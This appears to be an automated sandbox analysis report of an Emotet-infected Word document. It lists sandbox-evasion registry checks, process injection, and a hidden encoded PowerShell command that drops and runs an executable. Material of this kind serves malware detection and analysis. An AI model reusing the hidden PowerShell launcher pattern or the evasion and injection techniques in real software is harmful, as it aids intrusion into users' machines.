Analysis

max time kernel: 25s
resource: win10v191014
submitted: 16-12-2019 11:41

General
Malware Config
Extracted
Extracted
emotet
Signatures

Executes dropped EXE (2 IoCs)
pid   Process
4624  78.exe
4664  78.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description        ioc
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0

Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid   Process
4904  WINWORD.EXE

Suspicious use of SetWindowsHookEx (3 IoCs)
pid   Process
4904  WINWORD.EXE
4624  78.exe
4664  78.exe

Suspicious use of WriteProcessMemory (3 IoCs)
description                       pid   Process           procid_target
PID 1000 wrote to memory of 2900  1000  SppExtComObj.exe  76
PID 4472 wrote to memory of 4624  4472  Powershell.exe    80
PID 4624 wrote to memory of 4664  4624  78.exe            81

Suspicious use of AdjustPrivilegeToken (1 IoC)
description              pid   Process
Token: SeDebugPrivilege  4472  Powershell.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
description        ioc
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious use of FindShellTrayWindow (1 IoC)
pid   Process
4904  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
pid   Process
4472  Powershell.exe

Suspicious behavior: EmotetMutantsSpam (1 IoC)
pid   Process
4664  78.exe

Checks system information in the registry (2 TTPs, 2 IoCs)
System information is often read in order to detect sandboxing environments.
description        ioc
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8b609fd8a3fa8035a22468460e491f21ffa438e527463173a2403dc4097640d9.doc" /o ""
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of FindShellTrayWindow
  PID: 4904

C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  - Suspicious use of WriteProcessMemory
  PID: 1000

  C:\Windows\System32\SLUI.exe
    "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
    PID: 2900

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Powershell -w hidden -en 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
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  PID: 4472

  C:\Users\Admin\78.exe
    "C:\Users\Admin\78.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID: 4624

    C:\Users\Admin\78.exe
      C:\Users\Admin\78.exe --a87aaf2b
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious behavior: EmotetMutantsSpam
      PID: 4664